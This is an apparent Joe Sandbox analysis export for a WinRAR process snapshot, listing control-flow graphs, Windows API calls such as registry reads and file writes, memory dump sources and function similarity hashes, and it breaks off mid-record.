                                                                                                                                                                                                                                                                    control_flow_graph 1564 7ff695d17f24-7ff695d17f5c 1565 7ff695d17f5e-7ff695d17f64 1564->1565 1566 7ff695d17fd0 1564->1566 1565->1566 1567 7ff695d17f66-7ff695d17f7c call 7ff695d1b3f0 1565->1567 1568 7ff695d17fd7-7ff695d17fea 1566->1568 1578 7ff695d17f7e-7ff695d17fb3 GetProcAddressForCaller GetProcAddress 1567->1578 1579 7ff695d17fb5 1567->1579 1569 7ff695d18036-7ff695d18039 1568->1569 1570 7ff695d17fec-7ff695d17fef 1568->1570 1572 7ff695d1805c-7ff695d18065 GetCurrentProcessId 1569->1572 1575 7ff695d1803b-7ff695d1804a 1569->1575 1570->1572 1573 7ff695d17ff1-7ff695d18000 1570->1573 1576 7ff695d18077-7ff695d18093 1572->1576 1577 7ff695d18067 1572->1577 1585 7ff695d18005-7ff695d18007 1573->1585 1584 7ff695d1804f-7ff695d18051 1575->1584 1582 7ff695d18069-7ff695d18075 1577->1582 1583 7ff695d17fbc-7ff695d17fce 1578->1583 1579->1583 1582->1576 1582->1582 1583->1568 1584->1576 1586 7ff695d18053-7ff695d1805a 1584->1586 1585->1576 1587 7ff695d18009 1585->1587 1588 7ff695d18010-7ff695d18034 call 7ff695ceca6c call 7ff695cecda4 call 7ff695ceca40 1586->1588 1587->1588 1588->1576
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000067.00000002.2422125034.00007FF695CD1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF695CD0000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422092068.00007FF695CD0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422182749.00007FF695D40000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422226086.00007FF695D58000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422259960.00007FF695D59000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422291349.00007FF695D5A000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422291349.00007FF695D64000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422291349.00007FF695D6E000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422291349.00007FF695D76000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422425142.00007FF695D78000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422459095.00007FF695D7E000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_103_2_7ff695cd0000_rar.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: AddressProc$CallerCurrentDirectoryProcessSystem
                                                                                                                                                                                                                                                                    • String ID: Crypt32.dll$CryptProtectMemory$CryptProtectMemory failed$CryptUnprotectMemory$CryptUnprotectMemory failed
                                                                                                                                                                                                                                                                    • API String ID: 1389829785-2207617598
                                                                                                                                                                                                                                                                    • Opcode ID: 55f9cc654a4765269b34be058e69e02607cbee85ebbaa2d255acd8e9286e0d92
                                                                                                                                                                                                                                                                    • Instruction ID: c56d37c46c8cb902bd84ff1542e4dc6049cdaa78d138650199d7af5331e1c856
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 55f9cc654a4765269b34be058e69e02607cbee85ebbaa2d255acd8e9286e0d92
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 11414C21A08A8681FA69DB52A80157567E1FF45FD4F0823B5CD5E877A4DE7CEC4A8308

                                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000067.00000002.2422125034.00007FF695CD1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF695CD0000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422092068.00007FF695CD0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422182749.00007FF695D40000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422226086.00007FF695D58000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422259960.00007FF695D59000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422291349.00007FF695D5A000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422291349.00007FF695D64000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422291349.00007FF695D6E000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422291349.00007FF695D76000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422425142.00007FF695D78000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422459095.00007FF695D7E000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_103_2_7ff695cd0000_rar.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: ExceptionFilterPresentUnhandled__scrt_fastfail__scrt_is_nonwritable_in_current_image$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual__isa_available_init__scrt_acquire_startup_lock__scrt_initialize_crt__scrt_is_managed_app__scrt_release_startup_lock__scrt_uninitialize_crt__vcrt_initialize
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID: 552178382-0
                                                                                                                                                                                                                                                                    • Opcode ID: 9c665b31eb0b804363cbc587f94f2e5aa54598bfa8fc207139a92aecf1914098
                                                                                                                                                                                                                                                                    • Instruction ID: 80a26a7e12cc6d7edcb3669c2ffd2fbc1025f3abe33b11e9c03808103ef4d8c5
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 9c665b31eb0b804363cbc587f94f2e5aa54598bfa8fc207139a92aecf1914098
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: DB314E21E0D28381FA34AB25A5153B913D1EF45F84F4472B4DA4DCB6D7DEACEC0E8648

                                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    • RegOpenKeyExW.KERNELBASE(?,?,?,?,?,00007FF695D1495D,?,?,?,00007FF695D07E7D), ref: 00007FF695D147DB
                                                                                                                                                                                                                                                                    • RegQueryValueExW.ADVAPI32(?,?,?,?,?,00007FF695D1495D,?,?,?,00007FF695D07E7D), ref: 00007FF695D14831
                                                                                                                                                                                                                                                                    • ExpandEnvironmentStringsW.KERNEL32(?,?,?,?,?,00007FF695D1495D,?,?,?,00007FF695D07E7D), ref: 00007FF695D14853
                                                                                                                                                                                                                                                                    • RegCloseKey.ADVAPI32(?,?,?,?,?,00007FF695D1495D,?,?,?,00007FF695D07E7D), ref: 00007FF695D148A6
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000067.00000002.2422125034.00007FF695CD1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF695CD0000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422092068.00007FF695CD0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422182749.00007FF695D40000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422226086.00007FF695D58000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422259960.00007FF695D59000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422291349.00007FF695D5A000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422291349.00007FF695D64000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422291349.00007FF695D6E000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422291349.00007FF695D76000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422425142.00007FF695D78000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422459095.00007FF695D7E000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_103_2_7ff695cd0000_rar.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: CloseEnvironmentExpandOpenQueryStringsValue
                                                                                                                                                                                                                                                                    • String ID: LanguageFolder$Software\WinRAR\General
                                                                                                                                                                                                                                                                    • API String ID: 1800380464-3408810217
                                                                                                                                                                                                                                                                    • Opcode ID: df8e8945b6f074808e1d136ded68da0d597e77b5ffd7a0622e633ce0ea7293c4
                                                                                                                                                                                                                                                                    • Instruction ID: 3bac9cceaa7e33697a308fb5dff5aa529df8811d7adbf5e90f79641f2e99ecc9
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: df8e8945b6f074808e1d136ded68da0d597e77b5ffd7a0622e633ce0ea7293c4
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: AA319222718A8181EB709F21E8102BE6391FF85B94F406371EE4D8BBD9EF6CD949C744

                                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    • RegOpenKeyExW.KERNELBASE(?,?,?,?,00000800,00000000,00000000,00007FF695D038CB,?,?,?,00007FF695D041EC), ref: 00007FF695D043D1
                                                                                                                                                                                                                                                                    • RegQueryValueExW.ADVAPI32(?,?,?,?,00000800,00000000,00000000,00007FF695D038CB,?,?,?,00007FF695D041EC), ref: 00007FF695D04402
                                                                                                                                                                                                                                                                    • RegCloseKey.ADVAPI32(?,?,?,?,00000800,00000000,00000000,00007FF695D038CB,?,?,?,00007FF695D041EC), ref: 00007FF695D0440D
                                                                                                                                                                                                                                                                    • GetModuleFileNameW.KERNEL32(?,?,?,?,00000800,00000000,00000000,00007FF695D038CB,?,?,?,00007FF695D041EC), ref: 00007FF695D0443E
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000067.00000002.2422125034.00007FF695CD1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF695CD0000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422092068.00007FF695CD0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422182749.00007FF695D40000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422226086.00007FF695D58000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422259960.00007FF695D59000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422291349.00007FF695D5A000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422291349.00007FF695D64000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422291349.00007FF695D6E000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422291349.00007FF695D76000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422425142.00007FF695D78000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422459095.00007FF695D7E000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_103_2_7ff695cd0000_rar.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: CloseFileModuleNameOpenQueryValue
                                                                                                                                                                                                                                                                    • String ID: AppData$Software\WinRAR\Paths
                                                                                                                                                                                                                                                                    • API String ID: 3617018055-3415417297
                                                                                                                                                                                                                                                                    • Opcode ID: 070cc4d0cc6b07d111a1af4e028d2b6750b797b38322b9f578af6c992b8e5665
                                                                                                                                                                                                                                                                    • Instruction ID: f2d3368c863fe3d247c4d78898010ecf852403ae42af3734daa825af8662ddfc
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 070cc4d0cc6b07d111a1af4e028d2b6750b797b38322b9f578af6c992b8e5665
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: EE116022A1874285EA709F25A4005B973A0FF84FC4F446276EE4E87699EF7DD848C748

                                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                                    control_flow_graph 1715 7ff695cd7a5b-7ff695cd7a5e 1716 7ff695cd7a60-7ff695cd7a66 1715->1716 1717 7ff695cd7a68 1715->1717 1716->1717 1718 7ff695cd7a6b-7ff695cd7a7c 1716->1718 1717->1718 1719 7ff695cd7a7e-7ff695cd7a81 1718->1719 1720 7ff695cd7aa8 1718->1720 1722 7ff695cd7a83-7ff695cd7a86 1719->1722 1723 7ff695cd7a88-7ff695cd7a8b 1719->1723 1721 7ff695cd7aab-7ff695cd7ab8 1720->1721 1724 7ff695cd7aba-7ff695cd7abd 1721->1724 1725 7ff695cd7ac8-7ff695cd7acb 1721->1725 1722->1720 1722->1723 1726 7ff695cd7aa4-7ff695cd7aa6 1723->1726 1727 7ff695cd7a8d-7ff695cd7a90 1723->1727 1724->1725 1728 7ff695cd7abf-7ff695cd7ac6 1724->1728 1729 7ff695cd7acf-7ff695cd7ad1 1725->1729 1726->1721 1727->1720 1730 7ff695cd7a92-7ff695cd7a99 1727->1730 1728->1729 1731 7ff695cd7ad3-7ff695cd7ae6 1729->1731 1732 7ff695cd7b2a-7ff695cd7bb0 call 7ff695cf1d34 call 7ff695cd3f04 1729->1732 1730->1726 1733 7ff695cd7a9b-7ff695cd7aa2 1730->1733 1734 7ff695cd7b0a-7ff695cd7b27 1731->1734 1735 7ff695cd7ae8-7ff695cd7af2 call 7ff695ce9be0 1731->1735 1744 7ff695cd7bb2-7ff695cd7bba 1732->1744 1745 7ff695cd7bbc 1732->1745 1733->1720 1733->1726 1734->1732 1739 7ff695cd7af7-7ff695cd7b02 1735->1739 1739->1734 1744->1745 1746 7ff695cd7bbf-7ff695cd7bc9 1744->1746 1745->1746 1747 7ff695cd7bda-7ff695cd7c06 call 7ff695cdb540 1746->1747 1748 7ff695cd7bcb-7ff695cd7bd5 call 7ff695cf1e1c 1746->1748 1752 7ff695cd7c40 1747->1752 1753 7ff695cd7c08-7ff695cd7c0f 1747->1753 1748->1747 1754 7ff695cd7c44-7ff695cd7c5a call 7ff695cdaa68 1752->1754 1753->1752 1755 7ff695cd7c11-7ff695cd7c14 1753->1755 1760 7ff695cd7c85-7ff695cd7c97 call 7ff695cdb540 1754->1760 1761 7ff695cd7c5c-7ff695cd7c6a 1754->1761 1755->1752 1757 7ff695cd7c16-7ff695cd7c2b 1755->1757 1757->1754 1759 7ff695cd7c2d-7ff695cd7c3e call 7ff695d29b98 1757->1759 1759->1754 1767 7ff695cd7c9c-7ff695cd7c9f 1760->1767 1761->1760 1764 7ff695cd7c6c-7ff695cd7c7e call 7ff695cd8d98 1761->1764 1764->1760 1769 7ff695cd7fa4-7ff695cd7fbe 1767->1769 1770 7ff695cd7ca5-7ff695cd7cfb call 7ff695d09354 call 7ff695cf6378 * 2 1767->1770 1777 7ff695cd7cfd-7ff695cd7d10 call 7ff695cd5414 1770->1777 1778 7ff695cd7d17-7ff695cd7d1f 1770->1778 1777->1778 1780 7ff695cd7de2-7ff695cd7de6 1778->1780 1781 7ff695cd7d25-7ff695cd7d28 1778->1781 1783 7ff695cd7e4e-7ff695cd7e68 call 7ff695d09958 1780->1783 1784 7ff695cd7de8-7ff695cd7e49 call 7ff695d098dc 1780->1784 1781->1780 1785 7ff695cd7d2e-7ff695cd7d36 1781->1785 1794 7ff695cd7e6a-7ff695cd7e84 1783->1794 1795 7ff695cd7e8b-7ff695cd7e8e 1783->1795 1784->1783 1788 7ff695cd7d38-7ff695cd7d49 call 7ff695d2a444 1785->1788 1789 7ff695cd7d59-7ff695cd7d6a call 7ff695d2a444 1785->1789 1801 7ff695cd7d4b-7ff695cd7d56 call 7ff695cf8ae8 1788->1801 1802 7ff695cd7d57 1788->1802 1797 7ff695cd7d6c-7ff695cd7d77 call 7ff695cfcf8c 1789->1797 1798 7ff695cd7d78-7ff695cd7dc6 1789->1798 1794->1795 1799 7ff695cd7e9f-7ff695cd7eb8 call 7ff695cd1204 1795->1799 1800 7ff695cd7e90-7ff695cd7e9a call 7ff695d09990 1795->1800 1797->1798 1798->1780 1823 7ff695cd7dc8-7ff695cd7de1 call 7ff695cd1314 call 7ff695d2ba34 1798->1823 1812 7ff695cd7ec8-7ff695cd7ed9 call 7ff695d0941c 1799->1812 1800->1799 1801->1802 1802->1798 1817 7ff695cd7eba-7ff695cd7ec3 call 7ff695d09680 1812->1817 1818 7ff695cd7edb-7ff695cd7f9f call 7ff695cd1400 call 7ff695cf6424 call 7ff695cdb540 1812->1818 1817->1812 1818->1769 1823->1780
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000067.00000002.2422125034.00007FF695CD1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF695CD0000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422092068.00007FF695CD0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422182749.00007FF695D40000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422226086.00007FF695D58000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422259960.00007FF695D59000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422291349.00007FF695D5A000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422291349.00007FF695D64000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422291349.00007FF695D6E000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422291349.00007FF695D76000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422425142.00007FF695D78000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422459095.00007FF695D7E000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_103_2_7ff695cd0000_rar.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                    • String ID: H9
                                                                                                                                                                                                                                                                    • API String ID: 0-2207570329
                                                                                                                                                                                                                                                                    • Opcode ID: c5ebd6c55152d2db874ee1ad0a7897bbb9475bd8dcfe15870fa8873135614add
                                                                                                                                                                                                                                                                    • Instruction ID: adabf471da5fab69f0338cb77fa590333666fff68ef69ed0536ebfdfa5c0b538
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: c5ebd6c55152d2db874ee1ad0a7897bbb9475bd8dcfe15870fa8873135614add
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 07E1AC63A08A92C5EB20DB24E048BFD27E5EB45B8CF4555BACE4D87786DF38E954C700

                                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                                    control_flow_graph 1858 7ff695cf2574-7ff695cf259c 1859 7ff695cf25a5-7ff695cf25a9 1858->1859 1860 7ff695cf259e-7ff695cf25a0 1858->1860 1862 7ff695cf25ba-7ff695cf25c6 1859->1862 1863 7ff695cf25ab-7ff695cf25b6 GetStdHandle 1859->1863 1861 7ff695cf273a-7ff695cf2756 1860->1861 1864 7ff695cf25c8-7ff695cf25cd 1862->1864 1865 7ff695cf2619-7ff695cf2637 WriteFile 1862->1865 1863->1862 1866 7ff695cf2644-7ff695cf2648 1864->1866 1867 7ff695cf25cf-7ff695cf2609 WriteFile 1864->1867 1868 7ff695cf263b-7ff695cf263e 1865->1868 1870 7ff695cf2733-7ff695cf2737 1866->1870 1871 7ff695cf264e-7ff695cf2652 1866->1871 1867->1866 1869 7ff695cf260b-7ff695cf2615 1867->1869 1868->1866 1868->1870 1869->1867 1872 7ff695cf2617 1869->1872 1870->1861 1871->1870 1873 7ff695cf2658-7ff695cf2692 GetLastError call 7ff695cf3144 SetLastError 1871->1873 1872->1868 1878 7ff695cf2694-7ff695cf26a2 1873->1878 1879 7ff695cf26bc-7ff695cf26d0 call 7ff695cec95c 1873->1879 1878->1879 1880 7ff695cf26a4-7ff695cf26ab 1878->1880 1885 7ff695cf26d2-7ff695cf26db 1879->1885 1886 7ff695cf2721-7ff695cf272e call 7ff695cecf14 1879->1886 1880->1879 1882 7ff695cf26ad-7ff695cf26b7 call 7ff695cecf34 1880->1882 1882->1879 1885->1862 1888 7ff695cf26e1-7ff695cf26e3 1885->1888 1886->1870 1888->1862 1889 7ff695cf26e9-7ff695cf271c 1888->1889 1889->1862
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000067.00000002.2422125034.00007FF695CD1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF695CD0000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422092068.00007FF695CD0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422182749.00007FF695D40000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422226086.00007FF695D58000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422259960.00007FF695D59000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422291349.00007FF695D5A000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422291349.00007FF695D64000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422291349.00007FF695D6E000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422291349.00007FF695D76000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422425142.00007FF695D78000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422459095.00007FF695D7E000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_103_2_7ff695cd0000_rar.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: ErrorFileLastWrite$Handle
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID: 3350704910-0
                                                                                                                                                                                                                                                                    • Opcode ID: ccd0c3e83433efd0ca407849e79df603d5f0c90f747e6cdc6739dd31fcb0c28b
                                                                                                                                                                                                                                                                    • Instruction ID: 82d5a13673fba512509a25b5c791e389a768840dd33c72a54e1139076c8ca213
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: ccd0c3e83433efd0ca407849e79df603d5f0c90f747e6cdc6739dd31fcb0c28b
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 30515E26A08642C6EA34DF25E81437A77F0EB45F84F541179DE4E8BAA1CF3CE845C644

                                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                                    control_flow_graph 1894 7ff695cf1e80-7ff695cf1ebb call 7ff695d2a5a0 1897 7ff695cf1ebd-7ff695cf1ec1 1894->1897 1898 7ff695cf1ec8 1894->1898 1897->1898 1899 7ff695cf1ec3-7ff695cf1ec6 1897->1899 1900 7ff695cf1ecb-7ff695cf1f57 CreateFileW 1898->1900 1899->1900 1901 7ff695cf1fcd-7ff695cf1fd1 1900->1901 1902 7ff695cf1f59-7ff695cf1f76 GetLastError call 7ff695d04534 1900->1902 1903 7ff695cf1fd3-7ff695cf1fd7 1901->1903 1904 7ff695cf1ff7-7ff695cf200f 1901->1904 1912 7ff695cf1fba 1902->1912 1913 7ff695cf1f78-7ff695cf1fb6 CreateFileW GetLastError 1902->1913 1903->1904 1906 7ff695cf1fd9-7ff695cf1ff1 SetFileTime 1903->1906 1907 7ff695cf2011-7ff695cf2022 call 7ff695d1a9e8 1904->1907 1908 7ff695cf2027-7ff695cf204b call 7ff695d2a610 1904->1908 1906->1904 1907->1908 1914 7ff695cf1fbf-7ff695cf1fc1 1912->1914 1913->1901 1916 7ff695cf1fb8 1913->1916 1914->1901 1917 7ff695cf1fc3 1914->1917 1916->1914 1917->1901
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000067.00000002.2422125034.00007FF695CD1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF695CD0000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422092068.00007FF695CD0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422182749.00007FF695D40000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422226086.00007FF695D58000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422259960.00007FF695D59000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422291349.00007FF695D5A000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422291349.00007FF695D64000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422291349.00007FF695D6E000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422291349.00007FF695D76000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422425142.00007FF695D78000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422459095.00007FF695D7E000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_103_2_7ff695cd0000_rar.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: File$CreateErrorLast$Time
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID: 1999340476-0
                                                                                                                                                                                                                                                                    • Opcode ID: 892e3554a84f7d5f3af4d66201b4842f90aabb2a874f58c4d931fe245cb08f10
